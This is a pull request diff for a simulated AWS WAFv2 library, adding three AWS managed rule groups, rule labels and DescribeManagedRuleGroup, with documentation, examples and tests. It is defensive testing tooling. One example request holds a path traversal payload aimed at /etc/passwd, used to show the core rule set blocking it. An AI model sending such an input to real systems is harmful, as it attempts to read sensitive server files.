### PR TITLE
feat: approximate AWS managed rule groups in WAF

### DIFF
--- a/docs/services/wafv2/README.md
+++ b/docs/services/wafv2/README.md
@@ -177,6 +177,234 @@ WAF stops reading a body, a header set or a cookie set at 8 KB. The rule's `Over
 what content past that point counts as. `MATCH` and `NO_MATCH` settle the statement without looking,
 and `CONTINUE` inspects as much as WAF would have read.
 
+## The AWS managed rule groups
+
+Three of the AWS managed rule groups are simulated, so a stack that turns them on deploys and its
+traffic can be tested against them.
+
+- `AWSManagedRulesCommonRuleSet`, the core rule set, 22 rules.
+- `AWSManagedRulesKnownBadInputsRuleSet`, 11 rules.
+- `AWSManagedRulesAdminProtectionRuleSet`, one rule.
+
+A group evaluates its rules in the order AWS documents them, adds the documented
+`awswaf:managed:aws:*` label to a request a rule claims, and blocks by that rule's action. The
+labels are on the decision, and they are what says which rule inside a group claimed the request.
+
+```typescript sim-wafv2-managed-rule-group
+/**
+ * Running the AWS core rule set over an application's own traffic.
+ */
+
+import { CreateWebACLCommand } from "@aws-sdk/client-wafv2";
+
+import { SimAws } from "@kensio/yulin";
+
+const waf = new SimAws().wafV2();
+
+const visibility = {
+  SampledRequestsEnabled: false,
+  CloudWatchMetricsEnabled: false,
+  MetricName: "api",
+};
+
+const created = await waf.createWebAcl(
+  new CreateWebACLCommand({
+    Name: "api-acl",
+    Scope: "REGIONAL",
+    DefaultAction: { Allow: {} },
+    VisibilityConfig: visibility,
+    Rules: [
+      {
+        Name: "core-rule-set",
+        Priority: 0,
+        OverrideAction: { None: {} },
+        Statement: {
+          ManagedRuleGroupStatement: {
+            VendorName: "AWS",
+            Name: "AWSManagedRulesCommonRuleSet",
+            RuleActionOverrides: [
+              { Name: "NoUserAgent_HEADER", ActionToUse: { Count: {} } },
+            ],
+          },
+        },
+        VisibilityConfig: visibility,
+      },
+    ],
+  }),
+);
+
+const webAclArn = created.Summary!.ARN;
+
+const healthCheck = waf.evaluateRequest({
+  webAclArn,
+  request: new Request("https://example.test/health"),
+});
+const traversal = waf.evaluateRequest({
+  webAclArn,
+  request: new Request(
+    "https://example.test/read?file=..%2F..%2Fetc%2Fpasswd",
+    {
+      headers: { "user-agent": "curl/8.5.0" },
+    },
+  ),
+});
+
+// "ALLOW" ["awswaf:managed:aws:core-rule-set:NoUserAgent_Header"]
+console.log(healthCheck.action, healthCheck.labels);
+
+// "BLOCK" "core-rule-set"
+console.log(traversal.action, traversal.terminatingRuleName);
+```
+
+The health check sends no User-Agent header, which `NoUserAgent_HEADER` claims. The override sets
+that rule to `Count`, so the request goes through carrying the label.
+
+`RuleActionOverrides`, `ScopeDownStatement` and `OverrideAction` behave as AWS documents them. An
+`OverrideAction` of `Count` holds the whole group to counting whatever its rules were set to. A
+`ScopeDownStatement` decides which requests the group sees at all, and a request it does not claim
+picks up no label from the group.
+
+`DescribeManagedRuleGroup` reports the rules of a group and the labels they add. An override names a
+rule in the spelling that reports.
+
+## How closely the managed rules match
+
+AWS publishes every rule name, every default action, every label and the size limits. It holds back
+the pattern set behind each rule, and says so. Each rule here declares how closely it follows the
+AWS rule it stands for, and `managedRules().rules()` reports the tier of every one.
+
+- **exact** matches where the AWS rule matches. The four `SizeRestrictions_*` rules at their
+  documented limits (2,048 bytes for the query string, 10,240 for the cookie header, 8,192 for the
+  body and 1,024 for the URI path), along with `NoUserAgent_HEADER`, `PROPFIND_METHOD` and
+  `Host_localhost_HEADER`.
+- **documented** matches the patterns AWS published and nothing beyond them. `Log4JRCE_*`,
+  `EC2MetaDataSSRF_*`, `GenericLFI_*`, `GenericRFI_*`, `RestrictedExtensions_*`,
+  `ExploitablePaths_URIPATH`, `AdminProtection_URIPATH`, `JavaDeserializationRCE_*` and
+  `UserAgent_BadBots_HEADER`.
+- **declared** detects nothing at all. The four `CrossSiteScripting_*` rules run AWS's own
+  detection, and AWS documents none of it.
+
+The tiers under-detect against AWS and never over-detect. The usual reason to put WAF in a test is
+to find out whether an application's own traffic still gets through with the core rule set on. A
+rule that blocked more than AWS blocks would fail that test for a request AWS allows, and send
+somebody off to work around a rule that does not exist. A rule that blocks less is invisible to that
+test and right on AWS too.
+
+`AdminProtection_URIPATH` is the one to know about. AWS gives `sqlmanager` as its example pattern
+and nothing else, so an application's own `/admin` paths reach it here. On AWS they may not.
+
+The reverse test, asserting that an attack payload is blocked, is covered by declaring the match.
+`onRequest` says which rules claim a request to one path, matched exactly.
+
+```typescript sim-wafv2-managed-declared-match
+/**
+ * Declaring the cross-site scripting match AWS does not document.
+ */
+
+import { SimAws } from "@kensio/yulin";
+
+const waf = new SimAws().wafV2();
+
+waf.managedRules().onRequest("/search", {
+  matches: ["CrossSiteScripting_QUERYARGUMENTS"],
+});
+
+// "declared"
+console.log(waf.managedRules().tierOf("CrossSiteScripting_QUERYARGUMENTS"));
+
+// "exact"
+console.log(waf.managedRules().tierOf("SizeRestrictions_BODY"));
+```
+
+A request to `/search` is then claimed by that rule, which labels it, blocks it and takes any
+override written for it, as a rule that detected the payload itself would.
+
+A match names the rule, in the spelling `RuleActionOverrides` and `DescribeManagedRuleGroup` use
+(`CrossSiteScripting_QUERYARGUMENTS`), and not the label the rule adds
+(`CrossSiteScripting_QueryArguments`). A name no simulated group holds is refused where it was
+written.
+
+Anything outside the three groups is refused by name, and the refusal says which are simulated. The
+IP reputation and anonymous IP groups decide by caller address, and every request in this simulation
+comes from one client. Bot Control and the account takeover groups decide by behaviour across
+requests. The SQL injection group is undocumented in the way the cross-site scripting rules are.
+
+## Labels
+
+A rule adds its labels to a request when it matches, and the rules that run after it can match on
+them with a `LabelMatchStatement`. A `LABEL` scope matches one fully qualified label and a
+`NAMESPACE` scope matches every label under a prefix.
+
+This is how a managed rule group is tuned. Run the group in count mode, and block on the label of
+the rule that matters.
+
+```typescript sim-wafv2-label-match
+/**
+ * Blocking on a label the core rule set left behind.
+ */
+
+import { CreateWebACLCommand } from "@aws-sdk/client-wafv2";
+
+import { SimAws } from "@kensio/yulin";
+
+const waf = new SimAws().wafV2();
+
+const visibility = {
+  SampledRequestsEnabled: false,
+  CloudWatchMetricsEnabled: false,
+  MetricName: "api",
+};
+
+const created = await waf.createWebAcl(
+  new CreateWebACLCommand({
+    Name: "api-acl",
+    Scope: "REGIONAL",
+    DefaultAction: { Allow: {} },
+    VisibilityConfig: visibility,
+    Rules: [
+      {
+        Name: "core-rule-set",
+        Priority: 0,
+        OverrideAction: { Count: {} },
+        Statement: {
+          ManagedRuleGroupStatement: {
+            VendorName: "AWS",
+            Name: "AWSManagedRulesCommonRuleSet",
+          },
+        },
+        VisibilityConfig: visibility,
+      },
+      {
+        Name: "block-restricted-files",
+        Priority: 1,
+        Action: { Block: {} },
+        Statement: {
+          LabelMatchStatement: {
+            Scope: "LABEL",
+            Key: "awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath",
+          },
+        },
+        VisibilityConfig: visibility,
+      },
+    ],
+  }),
+);
+
+const decision = waf.evaluateRequest({
+  webAclArn: created.Summary!.ARN,
+  request: new Request("https://example.test/app.ini", {
+    headers: { "user-agent": "curl/8.5.0" },
+  }),
+});
+
+// "BLOCK" "block-restricted-files"
+console.log(decision.action, decision.terminatingRuleName);
+```
+
+A rule of the web ACL's own adds a label under the name it gave it, with no prefix. A label from a
+managed rule group is qualified by the group it came from. That is the
+`awswaf:managed:aws:core-rule-set:` on the front of the key above.
+
 ## Answering a blocked request
 
 A `Block` action answers 403 with WAF's own body. A `CustomResponse` overrides the status and the
@@ -529,8 +757,9 @@ These statement kinds are refused:
   feasible and is not part of this yet.
 - `SqliMatchStatement` and `XssMatchStatement`. AWS publishes no description of the detection they
   run.
-- `ManagedRuleGroupStatement`, `RuleGroupReferenceStatement` and `LabelMatchStatement`. The AWS
-  managed rule groups are a body of rules Yulin would have to carry, and labels arrive with them.
+- `RuleGroupReferenceStatement`. A rule group of your own is a resource in its own right, and none
+  is simulated. The three simulated AWS managed rule groups are named in a statement rather than
+  created.
 
 `JsonBody`, `HeaderOrder`, `UriFragment`, `JA3Fingerprint` and `JA4Fingerprint` are refused as
 fields to match. The `Captcha` and `Challenge` actions are refused, along with the `CaptchaConfig`,
@@ -544,5 +773,5 @@ are refused for the same reason, each naming what it would have configured.
 
 `CreateWebACL`, `GetWebACL`, `UpdateWebACL`, `ListWebACLs`, `DeleteWebACL`, `CreateIPSet`,
 `GetIPSet`, `UpdateIPSet`, `ListIPSets`, `DeleteIPSet`, `CreateRegexPatternSet`,
-`GetRegexPatternSet`, `UpdateRegexPatternSet`, `ListRegexPatternSets` and
-`DeleteRegexPatternSet`.
+`GetRegexPatternSet`, `UpdateRegexPatternSet`, `ListRegexPatternSets`, `DeleteRegexPatternSet` and
+`DescribeManagedRuleGroup`.

--- a/docs/services/wafv2/sim-wafv2-label-match.example.ts
+++ b/docs/services/wafv2/sim-wafv2-label-match.example.ts
@@ -1,0 +1,60 @@
+/**
+ * Blocking on a label the core rule set left behind.
+ */
+
+import { CreateWebACLCommand } from "@aws-sdk/client-wafv2";
+
+import { SimAws } from "@kensio/yulin";
+
+const waf = new SimAws().wafV2();
+
+const visibility = {
+  SampledRequestsEnabled: false,
+  CloudWatchMetricsEnabled: false,
+  MetricName: "api",
+};
+
+const created = await waf.createWebAcl(
+  new CreateWebACLCommand({
+    Name: "api-acl",
+    Scope: "REGIONAL",
+    DefaultAction: { Allow: {} },
+    VisibilityConfig: visibility,
+    Rules: [
+      {
+        Name: "core-rule-set",
+        Priority: 0,
+        OverrideAction: { Count: {} },
+        Statement: {
+          ManagedRuleGroupStatement: {
+            VendorName: "AWS",
+            Name: "AWSManagedRulesCommonRuleSet",
+          },
+        },
+        VisibilityConfig: visibility,
+      },
+      {
+        Name: "block-restricted-files",
+        Priority: 1,
+        Action: { Block: {} },
+        Statement: {
+          LabelMatchStatement: {
+            Scope: "LABEL",
+            Key: "awswaf:managed:aws:core-rule-set:RestrictedExtensions_URIPath",
+          },
+        },
+        VisibilityConfig: visibility,
+      },
+    ],
+  }),
+);
+
+const decision = waf.evaluateRequest({
+  webAclArn: created.Summary!.ARN,
+  request: new Request("https://example.test/app.ini", {
+    headers: { "user-agent": "curl/8.5.0" },
+  }),
+});
+
+// "BLOCK" "block-restricted-files"
+console.log(decision.action, decision.terminatingRuleName);

--- a/docs/services/wafv2/sim-wafv2-managed-declared-match.example.ts
+++ b/docs/services/wafv2/sim-wafv2-managed-declared-match.example.ts
@@ -1,0 +1,17 @@
+/**
+ * Declaring the cross-site scripting match AWS does not document.
+ */
+
+import { SimAws } from "@kensio/yulin";
+
+const waf = new SimAws().wafV2();
+
+waf.managedRules().onRequest("/search", {
+  matches: ["CrossSiteScripting_QUERYARGUMENTS"],
+});
+
+// "declared"
+console.log(waf.managedRules().tierOf("CrossSiteScripting_QUERYARGUMENTS"));
+
+// "exact"
+console.log(waf.managedRules().tierOf("SizeRestrictions_BODY"));

--- a/docs/services/wafv2/sim-wafv2-managed-rule-group.example.ts
+++ b/docs/services/wafv2/sim-wafv2-managed-rule-group.example.ts
@@ -1,0 +1,63 @@
+/**
+ * Running the AWS core rule set over an application's own traffic.
+ */
+
+import { CreateWebACLCommand } from "@aws-sdk/client-wafv2";
+
+import { SimAws } from "@kensio/yulin";
+
+const waf = new SimAws().wafV2();
+
+const visibility = {
+  SampledRequestsEnabled: false,
+  CloudWatchMetricsEnabled: false,
+  MetricName: "api",
+};
+
+const created = await waf.createWebAcl(
+  new CreateWebACLCommand({
+    Name: "api-acl",
+    Scope: "REGIONAL",
+    DefaultAction: { Allow: {} },
+    VisibilityConfig: visibility,
+    Rules: [
+      {
+        Name: "core-rule-set",
+        Priority: 0,
+        OverrideAction: { None: {} },
+        Statement: {
+          ManagedRuleGroupStatement: {
+            VendorName: "AWS",
+            Name: "AWSManagedRulesCommonRuleSet",
+            RuleActionOverrides: [
+              { Name: "NoUserAgent_HEADER", ActionToUse: { Count: {} } },
+            ],
+          },
+        },
+        VisibilityConfig: visibility,
+      },
+    ],
+  }),
+);
+
+const webAclArn = created.Summary!.ARN;
+
+const healthCheck = waf.evaluateRequest({
+  webAclArn,
+  request: new Request("https://example.test/health"),
+});
+const traversal = waf.evaluateRequest({
+  webAclArn,
+  request: new Request(
+    "https://example.test/read?file=..%2F..%2Fetc%2Fpasswd",
+    {
+      headers: { "user-agent": "curl/8.5.0" },
+    },
+  ),
+});
+
+// "ALLOW" ["awswaf:managed:aws:core-rule-set:NoUserAgent_Header"]
+console.log(healthCheck.action, healthCheck.labels);
+
+// "BLOCK" "core-rule-set"
+console.log(traversal.action, traversal.terminatingRuleName);

--- a/src/service/wafv2/README.md
+++ b/src/service/wafv2/README.md
@@ -1,7 +1,8 @@
 # Simulated WAFv2 implementation
 
 This directory contains the simulated AWS WAFv2 implementation. It holds web ACLs, IP sets and
-regex pattern sets, and it evaluates a request against a web ACL's rules to reach a decision.
+regex pattern sets, and it evaluates a request against a web ACL's rules to reach a decision. Three
+of the AWS managed rule groups are carried here, approximated to a tier each rule declares.
 
 Association comes later. A CloudFront distribution, an API Gateway REST API stage and a Cognito
 user pool each get a web ACL in the issues after the one this was built for.
@@ -37,15 +38,27 @@ apart. A caller with no permission for a web ACL learns only about the permissio
 
 ## Rule evaluation
 
-`web-acl/sim-waf-web-acl.ts` holds the loop, and it is short because everything it needs was worked
-out when the web ACL was written. Rules run in ascending `Priority`. The first rule that matches and
-carries a terminating action decides the request. A `Count` action records the match and lets the
-next rule have a look. A request no rule terminates gets the ACL's `DefaultAction`.
+`evaluate/sim-waf-evaluate-rules.ts` holds the loop, and it is short because everything it needs was
+worked out when the web ACL was written. Rules run in ascending `Priority`. The first rule that
+matches and carries a terminating action decides the request. A `Count` action records the match and
+lets the next rule have a look. A request no rule terminates gets the ACL's `DefaultAction`, which
+is the one thing the loop leaves to `web-acl/sim-waf-web-acl.ts`.
+
+`web-acl/sim-waf-rule.ts` answers with the action a rule applies, or with nothing when the rule does
+not claim the request. Most rules answer with the action they were written with. A rule naming a
+managed rule group answers with the action of whichever rule inside the group claimed the request,
+and that is the whole reason a rule answers with an action at all.
 
 `evaluate/sim-waf-decision.ts` is what comes back. It carries the action, the rule that decided, the
-rules that counted, the headers to add to a forwarded request, and what to answer a blocked request
-with. The counted rules matter because a `Count` action leaves the request as it found it. A test
-staging a rule before turning it on asserts against that list.
+rules that counted, the labels the request picked up, the headers to add to a forwarded request, and
+what to answer a blocked request with. The counted rules matter because a `Count` action leaves the
+request as it found it. A test staging a rule before turning it on asserts against that list.
+
+`evaluate/sim-waf-request-labels.ts` is the labels one request collected. They belong to the request
+being evaluated because that is where AWS puts them. A rule adds its labels when it matches, and the
+rules after it can match on them. `statement/sim-waf-label-match.ts` is the reading side, and
+`web-acl/sim-waf-rule-labels.ts` is a rule's own labels. A label added by a rule of the web ACL's
+own carries no prefix, where a label from a rule group is qualified by the group it came from.
 
 `web-acl/sim-waf-custom-response.ts` keeps the two header readers apart, and the difference is
 easy to get wrong. WAF prefixes an inserted request header with `x-amzn-waf-` as it adds it to what
@@ -85,6 +98,54 @@ read.
 
 Matching is case sensitive throughout, as it is on AWS. A rule that means to ignore case says so
 with a `LOWERCASE` transformation and a lower case search string.
+
+## The AWS managed rule groups
+
+`managed/` carries `AWSManagedRulesCommonRuleSet`, `AWSManagedRulesKnownBadInputsRuleSet` and
+`AWSManagedRulesAdminProtectionRuleSet`. AWS publishes every rule name, every default action, every
+label and the size limits, and holds back the pattern set behind each rule. What is here follows
+from that split.
+
+`managed/group/` holds the three groups, each an ordered list of rules. The order is AWS's own and
+it decides which of two matching rules blocks a request and whose label the request carries. The
+core rule set is split across two files (`sim-waf-core-request-rules.ts` and
+`sim-waf-core-payload-rules.ts`) because 22 rules in one file scores over the FTA threshold, and the
+join between them is where AWS's order goes from reading the request to looking inside it.
+
+Every rule declares a tier, in `managed/sim-waf-managed-rule.type.ts`.
+
+- `exact` matches where the AWS rule matches. The four `SizeRestrictions_*` rules at their
+  documented limits, `NoUserAgent_HEADER`, `PROPFIND_METHOD` and `Host_localhost_HEADER`.
+- `documented` matches the patterns AWS published for the rule and nothing beyond them.
+- `declared` detects nothing and matches a request a test declared a match for. The four
+  `CrossSiteScripting_*` rules run detection AWS documents none of.
+
+The tiers under-detect against AWS and never over-detect. The reason is what a test with the core
+rule set on is usually asking. A rule that blocked more than AWS blocks would fail that test for a
+request AWS allows, and send somebody off to work around a rule that does not exist. A rule that
+blocks less is invisible to it and right on AWS too. So `managed/detect/sim-waf-managed-patterns.ts`
+carries a pattern only where AWS published one, and the reverse test is covered by declaring a
+match.
+
+`Host_localhost_HEADER` is the one rule the simulation had to think about twice. It blocks a request
+whose Host header holds `localhost`, and Yulin serves every simulated endpoint under
+`*.sim-aws.localhost`. It reads `SimWafInspectedRequest.host`, which is the AWS-facing hostname with
+the Yulin-local suffix taken off, so it claims a request addressed to localhost and leaves the ones
+addressed to a simulated endpoint alone.
+
+`managed/sim-waf-managed-rules.ts` is the accessor behind `SimWafV2.managedRules()`. It holds the
+declared matches, keyed by URI path and matched exactly as simulated Rekognition matches the name of
+an image a result was declared for, and it reports the tier of every rule.
+
+`managed/sim-waf-managed-group-statement.ts` compiles a rule that names a group. The two overrides
+stack in one direction. `RuleActionOverrides` sets what a named rule does, and an `OverrideAction`
+of `Count` then holds the whole group to counting whatever its rules were set to. A
+`ScopeDownStatement` decides whether the group sees the request at all, and a request it does not
+claim picks up no label.
+
+`command/managed-rule-group/` is `DescribeManagedRuleGroup`, which reports the rules of a group and
+the labels they add. It is the only WAFv2 operation these groups have of their own, and it
+authorizes against `*` as the listings do.
 
 ## Refusals
 
@@ -129,7 +190,13 @@ id, the ARN and the first lock token. `simWafStatementMatches` puts one statemen
 rule and answers with a predicate over requests. That predicate is the whole of what a test about a
 statement kind wants to say.
 
+`simWafWebAclDecisions` is `simWafStatementMatches` for a test that wants the whole decision rather
+than whether one statement claimed the request. `simWafBrowserRequest` sends a User-Agent header,
+because `NoUserAgent_HEADER` claims a request without one and a test about any other rule would
+otherwise never reach it.
+
 `web-acl/sim-waf-rule.factory.ts` and `command/web-acl/sim-waf-create-web-acl.factory.ts` build the
-two shapes a test writes over and over. Overrides are merged into the defaults, and `Statement` and
+two shapes a test writes over and over. `simWafManagedRuleFactory` is the third, for a rule that
+names the core rule set. Overrides are merged into the defaults, and `Statement` and
 `Action` each hold one kind at a time, and a test replaces those whole. Merging two statement kinds
 onto one statement produces a rule WAF would refuse, and the factory says as much.

--- a/src/service/wafv2/command/managed-rule-group/managed-rule-group.command.ts
+++ b/src/service/wafv2/command/managed-rule-group/managed-rule-group.command.ts
@@ -1,0 +1,43 @@
+import type { SimResponseMetadata } from "../../../aws/metadata/response-metadata.type.js";
+import type { SimWafActionInput } from "../../web-acl/sim-waf-action.type.js";
+
+/**
+ * What a description reports about one rule of a managed group.
+ */
+export interface SimWafManagedRuleSummaryOutput {
+  readonly Name: string;
+
+  /** The action the rule takes unless an override says otherwise. */
+  readonly Action: SimWafActionInput;
+}
+
+/**
+ * One label a managed rule group can add.
+ */
+export interface SimWafLabelSummaryOutput {
+  readonly Name: string;
+}
+
+/**
+ * Minimal structural sim WAFv2 DescribeManagedRuleGroup command.
+ *
+ * https://docs.aws.amazon.com/AWSJavaScriptSDK/v3/latest/client/wafv2/command/DescribeManagedRuleGroupCommand/
+ */
+export interface SimDescribeManagedRuleGroupCommand {
+  readonly input: SimDescribeManagedRuleGroupCommandInput;
+}
+
+export interface SimDescribeManagedRuleGroupCommandInput {
+  readonly VendorName?: string | undefined;
+  readonly Name?: string | undefined;
+  readonly Scope?: string | undefined;
+  readonly VersionName?: string | undefined;
+}
+
+export interface SimDescribeManagedRuleGroupCommandOutput {
+  readonly Capacity?: number | undefined;
+  readonly Rules?: readonly SimWafManagedRuleSummaryOutput[] | undefined;
+  readonly LabelNamespace?: string | undefined;
+  readonly AvailableLabels?: readonly SimWafLabelSummaryOutput[] | undefined;
+  readonly $metadata: SimResponseMetadata;
+}

--- a/src/service/wafv2/command/managed-rule-group/sim-wafv2-describe-managed-rule-group.iso.test.ts
+++ b/src/service/wafv2/command/managed-rule-group/sim-wafv2-describe-managed-rule-group.iso.test.ts
@@ -1,0 +1,114 @@
+import {
+  DescribeManagedRuleGroupCommand,
+  WAFV2Client,
+} from "@aws-sdk/client-wafv2";
+import {
+  assertArrayIncludes,
+  assertArrayLength,
+  assertIdentical,
+  assertInstanceOf,
+  assertStringIncludes,
+  assertThrowsErrorAsync,
+} from "@kensio/smartass";
+import { describe, it } from "vitest";
+
+import { SimSdk } from "../../../../sdk/index.js";
+import { SimAws } from "../../../aws/sim-aws.js";
+import { SimWafUnsimulatedInputException } from "../../error/sim-wafv2.error.js";
+
+describe("SimWafV2 DescribeManagedRuleGroup", () => {
+  it("reports the rules and labels of a simulated group", async () => {
+    // Given a simulated WAFv2.
+    const waf = new SimAws().wafV2();
+
+    // When the known bad inputs group is described.
+    const described = await waf.describeManagedRuleGroup({
+      input: {
+        VendorName: "AWS",
+        Name: "AWSManagedRulesKnownBadInputsRuleSet",
+        Scope: "REGIONAL",
+      },
+    });
+
+    // Then it reports what a caller writing an override needs: the rules in
+    // the order the group runs them, what each does, and the labels they add.
+    assertArrayLength(described.Rules ?? [], 11);
+    assertIdentical(
+      described.Rules?.[0]?.Name,
+      "JavaDeserializationRCE_HEADER",
+    );
+    assertIdentical(described.Capacity, 200);
+    assertIdentical(
+      described.LabelNamespace,
+      "awswaf:managed:aws:known-bad-inputs:",
+    );
+    assertArrayIncludes(
+      (described.AvailableLabels ?? []).map((label) => label.Name),
+      "awswaf:managed:aws:known-bad-inputs:Log4JRCE_Body",
+    );
+  });
+
+  it("refuses a group that is not simulated", async () => {
+    // Given a simulated WAFv2.
+    const waf = new SimAws().wafV2();
+
+    // When a group outside the three is described.
+    const error = await assertThrowsErrorAsync(async () => {
+      await waf.describeManagedRuleGroup({
+        input: {
+          VendorName: "AWS",
+          Name: "AWSManagedRulesSQLiRuleSet",
+          Scope: "REGIONAL",
+        },
+      });
+    });
+
+    // Then it is refused by name, saying which groups are simulated.
+    assertInstanceOf(error, SimWafUnsimulatedInputException);
+    assertStringIncludes(error.message, "AWSManagedRulesSQLiRuleSet");
+    assertStringIncludes(error.message, "AWSManagedRulesCommonRuleSet");
+  });
+
+  it("refuses a published version of a group", async () => {
+    // Given a simulated WAFv2.
+    const waf = new SimAws().wafV2();
+
+    // When a description names a version.
+    const error = await assertThrowsErrorAsync(async () => {
+      await waf.describeManagedRuleGroup({
+        input: {
+          VendorName: "AWS",
+          Name: "AWSManagedRulesCommonRuleSet",
+          Scope: "REGIONAL",
+          VersionName: "Version_1.9",
+        },
+      });
+    });
+
+    // Then it is refused rather than answered with rules that are not the ones
+    // that version holds.
+    assertInstanceOf(error, SimWafUnsimulatedInputException);
+    assertStringIncludes(error.message, "VersionName");
+  });
+
+  it("answers an intercepted SDK client", async () => {
+    // Given an intercepted WAFv2 SDK client.
+    using simSdk = new SimSdk();
+    simSdk.intercept(WAFV2Client);
+
+    const client = new WAFV2Client({ region: "eu-west-2" });
+
+    // When ordinary SDK code describes the core rule set.
+    const described = await client.send(
+      new DescribeManagedRuleGroupCommand({
+        VendorName: "AWS",
+        Name: "AWSManagedRulesCommonRuleSet",
+        Scope: "REGIONAL",
+      }),
+    );
+
+    // Then it was answered by the simulator, with nothing touching the
+    // network.
+    assertArrayLength(described.Rules ?? [], 22);
+  });
+});

--- a/src/service/wafv2/command/managed-rule-group/sim-wafv2-described-rule-group.ts
+++ b/src/service/wafv2/command/managed-rule-group/sim-wafv2-described-rule-group.ts
@@ -1,0 +1,46 @@
+import { SimWafUnsimulatedInputException } from "../../error/sim-wafv2.error.js";
+import {
+  findSimWafManagedRuleGroup,
+  simWafManagedRuleGroupNames,
+} from "../../managed/sim-waf-managed-rule-groups.js";
+import type { SimWafManagedRuleGroupDefinition } from "../../managed/sim-waf-managed-rule.type.js";
+
+/**
+ * Find the group a description names, refusing one that is not simulated.
+ */
+export function requiredSimWafDescribedGroup(
+  vendorName: string | undefined,
+  name: string | undefined,
+): SimWafManagedRuleGroupDefinition {
+  const group = findSimWafManagedRuleGroup(vendorName, name);
+
+  if (group === undefined) {
+    const simulated = simWafManagedRuleGroupNames().join(", ");
+
+    throw new SimWafUnsimulatedInputException(
+      `The managed rule group ${String(vendorName)} ${String(name)} is not ` +
+        `simulated: the simulated groups are ${simulated}`,
+    );
+  }
+
+  return group;
+}
+
+/**
+ * Refuse a description of a published version of a group.
+ *
+ * A version is a snapshot of the rules as they stood on a date, and only the
+ * current rules are carried here, so a version name would be answered with
+ * rules that are not the ones it names.
+ */
+export function refuseSimWafManagedRuleGroupVersion(
+  versionName: string | undefined,
+): void {
+  if (versionName !== undefined) {
+    throw new SimWafUnsimulatedInputException(
+      "DescribeManagedRuleGroup refuses a VersionName, which Yulin does not " +
+        "simulate: a versioned rule group is a snapshot of rules that were " +
+        "published on a date, and only the current rules are carried here",
+    );
+  }
+}

--- a/src/service/wafv2/command/managed-rule-group/sim-wafv2-managed-rule-group-commands.ts
+++ b/src/service/wafv2/command/managed-rule-group/sim-wafv2-managed-rule-group-commands.ts
@@ -1,0 +1,68 @@
+import type { SimAwsAccountRegionScope } from "../../../aws/sim-aws-account-region-scope.js";
+import { requiredSimWafScope } from "../../scope/sim-waf-scope.js";
+import type { SimWafAuthorizer } from "../authorize/sim-wafv2-authorizer.js";
+import type { SimWafRequestOptions } from "../sim-wafv2-request-options.js";
+import type {
+  SimDescribeManagedRuleGroupCommand,
+  SimDescribeManagedRuleGroupCommandOutput,
+} from "./managed-rule-group.command.js";
+import {
+  refuseSimWafManagedRuleGroupVersion,
+  requiredSimWafDescribedGroup,
+} from "./sim-wafv2-described-rule-group.js";
+
+interface SimWafManagedRuleGroupCommandsProperties {
+  readonly authorizer: SimWafAuthorizer;
+  readonly accountRegionScope: SimAwsAccountRegionScope;
+}
+
+/**
+ * The command that reports what is in a managed rule group.
+ *
+ * This is how a caller finds out which rules a group holds and what to name in
+ * a `RuleActionOverrides`, and it is the only WAFv2 operation the AWS managed
+ * groups have of their own. Real WAFv2 gives it no resource type, so it
+ * authorizes against `*` as the listings do.
+ */
+export class SimWafManagedRuleGroupCommands {
+  readonly #authorizer: SimWafAuthorizer;
+  readonly #accountRegionScope: SimAwsAccountRegionScope;
+
+  constructor(properties: SimWafManagedRuleGroupCommandsProperties) {
+    this.#authorizer = properties.authorizer;
+    this.#accountRegionScope = properties.accountRegionScope;
+  }
+
+  /**
+   * Describe the rules and labels of one managed rule group.
+   */
+  describeManagedRuleGroup(
+    command: SimDescribeManagedRuleGroupCommand,
+    options?: SimWafRequestOptions,
+  ): SimDescribeManagedRuleGroupCommandOutput {
+    const { input } = command;
+
+    requiredSimWafScope(input.Scope, this.#accountRegionScope.regionName);
+    refuseSimWafManagedRuleGroupVersion(input.VersionName);
+
+    this.#authorizer.authorizeNoResource(
+      "wafv2:DescribeManagedRuleGroup",
+      options?.caller,
+    );
+
+    const group = requiredSimWafDescribedGroup(input.VendorName, input.Name);
+
+    return {
+      $metadata: {},
+      Capacity: group.capacity,
+      LabelNamespace: `${group.labelNamespace}:`,
+      Rules: group.rules.map((rule) => ({
+        Name: rule.name,
+        Action: { Block: {} },
+      })),
+      AvailableLabels: group.rules.map((rule) => ({
+        Name: `${group.labelNamespace}:${rule.label}`,
+      })),
+    };
+  }
+}

--- a/src/service/wafv2/command/sim-wafv2-command.types.ts
+++ b/src/service/wafv2/command/sim-wafv2-command.types.ts
@@ -20,6 +20,13 @@ export type {
   SimWafIpSetOutput,
 } from "./ip-set/ip-set.command.js";
 export type {
+  SimDescribeManagedRuleGroupCommand,
+  SimDescribeManagedRuleGroupCommandInput,
+  SimDescribeManagedRuleGroupCommandOutput,
+  SimWafLabelSummaryOutput,
+  SimWafManagedRuleSummaryOutput,
+} from "./managed-rule-group/managed-rule-group.command.js";
+export type {
   SimCreateRegexPatternSetCommand,
   SimCreateRegexPatternSetCommandInput,
   SimCreateRegexPatternSetCommandOutput,

--- a/src/service/wafv2/command/web-acl/sim-wafv2-web-acl-commands.ts
+++ b/src/service/wafv2/command/web-acl/sim-wafv2-web-acl-commands.ts
@@ -1,4 +1,5 @@
 import type { SimAwsAccountRegionScope } from "../../../aws/sim-aws-account-region-scope.js";
+import type { SimWafManagedRules } from "../../managed/sim-waf-managed-rules.js";
 import type { SimWafRegexPatternSet } from "../../regex-pattern-set/sim-waf-regex-pattern-set.js";
 import type { SimWafResourceStore } from "../../resource/sim-waf-resource-store.js";
 import { requiredSimWafScope } from "../../scope/sim-waf-scope.js";
@@ -30,6 +31,7 @@ import type {
 interface SimWafWebAclCommandsProperties {
   readonly webAcls: SimWafResourceStore<SimWafWebAcl>;
   readonly regexPatternSets: SimWafResourceStore<SimWafRegexPatternSet>;
+  readonly managedRules: SimWafManagedRules;
   readonly authorizer: SimWafAuthorizer;
   readonly accountRegionScope: SimAwsAccountRegionScope;
 }
@@ -44,12 +46,14 @@ interface SimWafWebAclCommandsProperties {
 export class SimWafWebAclCommands {
   readonly #webAcls: SimWafResourceStore<SimWafWebAcl>;
   readonly #regexPatternSets: SimWafResourceStore<SimWafRegexPatternSet>;
+  readonly #managedRules: SimWafManagedRules;
   readonly #authorizer: SimWafAuthorizer;
   readonly #accountRegionScope: SimAwsAccountRegionScope;
 
   constructor(properties: SimWafWebAclCommandsProperties) {
     this.#webAcls = properties.webAcls;
     this.#regexPatternSets = properties.regexPatternSets;
+    this.#managedRules = properties.managedRules;
     this.#authorizer = properties.authorizer;
     this.#accountRegionScope = properties.accountRegionScope;
   }
@@ -77,6 +81,7 @@ export class SimWafWebAclCommands {
       description: input.Description,
       configuration: configurationOf(input),
